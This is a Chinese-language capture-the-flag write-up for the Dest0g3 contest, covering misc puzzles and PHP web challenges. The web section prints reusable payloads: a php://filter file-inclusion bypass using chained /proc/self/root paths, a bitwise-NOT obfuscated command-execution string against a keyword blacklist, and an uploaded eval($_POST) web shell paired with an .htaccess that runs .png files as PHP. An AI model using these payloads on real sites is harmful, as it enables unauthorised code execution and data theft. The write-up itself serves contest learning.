Dest0g3 部分wp

misc

Pngenius

下载下来是一张图片，查看一些基本信息后什么都没有，扔到010里，搜索一些常见的开头，发现藏了一个压缩包

存下来，发现有一个flag.txt，要密码，把压缩包扔进010，看看是不是伪加密，发现不是，尝试暴力破解也不行，看看图片是不是进行了什么隐写，放到stegsolve中，发现密码，这里的密码中间的空格要去掉。

easyEncode

题目下载下来就是一个压缩包，放到winhex里看看是不是伪加密，发现不是，尝试暴力破解

打开文本发现是一串摩斯密码，摩斯密码解密得到一串16进制，再转换得到一串不知道是啥的码，在百度搜索后知道把\u00去掉后是16进制，那就都去掉再转换得到base64，再转换

你知道js吗

下载下来没有后缀，修改后缀.rar解压打开后有一堆文件，一个个打开查看，在document.xml里发现一长串base64解码后得到一串不知道什么的编码，百度搜索要用urllib.parse.unquote转码，如果直接用utf-8在线转换得不到下一步的密码，没搞懂怎么用的，先没写

StrangeTraffic

下载后很明显是一个流量分析，用wireShark打开后，不知道下一步该怎么办了，上网搜索，发现要对ModBus追踪流，前面的RGVzdDBnM3是flag格式前面几个的base64码，把下面的全部组合到一起得到：RGVzdDBnM3szMUE1QkVBNi1GMjBELUYxOEEtRThFQS0yOUI0RjI1NzEwOEJ9解码得到flag

web

phpdest

看到require_once，知道是文件包含，equire_once() 为了避免重复加载文件，/proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接，想到这里，用伪协议配合多级符号链接的办法进行绕过。
构建pyload：
file=php://filter/convert.base64encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
得到base64编码，解码得到flag

EasyPHP

<?php
highlight_file(__FILE__);
include "fl4g.php";
$dest0g3 = $_POST['ctf'];
$time = date("H");
$timme = date("d");
$timmme = date("i");
if(($time > "24") or ($timme > "31") or ($timmme > "60")){
    echo $fl4g;
}else{
    echo "Try harder!";
}
set_error_handler(
    function() use(&$fl4g) {
        print $fl4g;
    }
);
$fl4g .= $dest0g3;
?> Try harder!

题目提示post一些东西

set_error_handler() 函数设置用户自定义的错误处理函数。 该函数用于创建运行时期间的用户自己的错误处理方法。 该函数会返回旧的错误处理程序，若失败，则返回 null。

所以让程序报错就会输出flag，post：ctf[]=2

SimpleRCE

<?php
highlight_file(__FILE__);
$aaa=$_POST['aaa'];
$black_list=array('^','.','`','>','<','=','"','preg','&','|','%0','popen','char','decode','html','md5','{','}','post','get','file','ascii','eval','replace','assert','exec','$','include','var','pastre','print','tail','sed','pcre','flag','scan','decode','system','func','diff','ini_','passthru','pcntl','proc_open','+','cat','tac','more','sort','log','current','\\','cut','bash','nl','wget','vi','grep');
$aaa = str_ireplace($black_list,"hacker",$aaa);
eval($aaa);
?>

被过滤了一堆东西，没有过滤~，%，但是还是不会写，百度搜索发现要用取反操作

使用PHP按位取反~绕过
由于取反之后会有大量不可显字符，所以我们同样需要将其url编码，然后当我们要用的时候，再利用取反符号把它们取回来即可

构建pyaload：

aaa=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

这里尝试后发现不行，问题还没找到

funny_upload

打开后就是要上传文件，能上传图片类文件
尝试上传写入<script language="php">eval($_POST['shell']);</script> 的图片，上传成功返回路径

尝试上传.htaccess文件，写入内容：base64编码后的

QWRkVHlwZSBhcHBsaWNhdGlvbi94LWh0dHBkLXBocCAucG5n

可以上传成功

蚁剑连接找到flag